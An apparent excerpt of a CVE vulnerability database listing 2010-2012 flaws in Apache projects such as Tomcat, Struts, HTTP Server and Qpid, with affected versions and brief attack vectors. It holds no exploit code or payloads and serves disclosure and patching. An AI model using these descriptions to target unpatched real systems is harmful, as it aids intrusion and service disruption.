12460| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
12461| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
12462| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
12463| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
12464| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
12465| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
12466| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
12467| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
12468| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
12469| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
12470| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
12471| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
12472| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
12473| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
12474| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
12475| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
12476| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
12477| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
12478| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
12479| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
12480| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
12481| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
12482| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
12483| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
12484| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
12485| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
12486| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
12487| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
12488| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
12489| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
12490| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
12491| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
12492| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
12493| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
12494| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
12495| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
12496| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
12497| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
12498| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
12499| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
12500| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
12501| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
12502| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
12503| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
12504| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
12505| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
12506| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
12507| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
12508| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
12509| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
12510| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
12511| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
12512| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
12513| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
12514| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
12515| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
12516| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
12517| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
12518| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
12519| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
12520| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
12521| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
12522| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
12523| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
12524| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
12525| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
12526| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
12527| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
12528| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
12529| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
12530| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
12531| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
12532| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
12533| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
12534| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
12535| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
12536| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
12537| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
12538| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
12539| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
12540| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
12541| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
12542| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
12543| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
12544| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
12545| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
12546| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
12547| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
12548| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
12549| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
12550| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
12551| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
12552| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
12553| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
12554| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
12555| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
12556| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
12557| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
12558| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
12559| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
12560| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
12561| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
12562| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
12563| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
12564| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
12565| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
12566| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
12567| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
12568| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
12569| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
12570| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
12571| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
12572| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
12573| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
12574| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
12575| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
12576| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
12577| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
12578| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
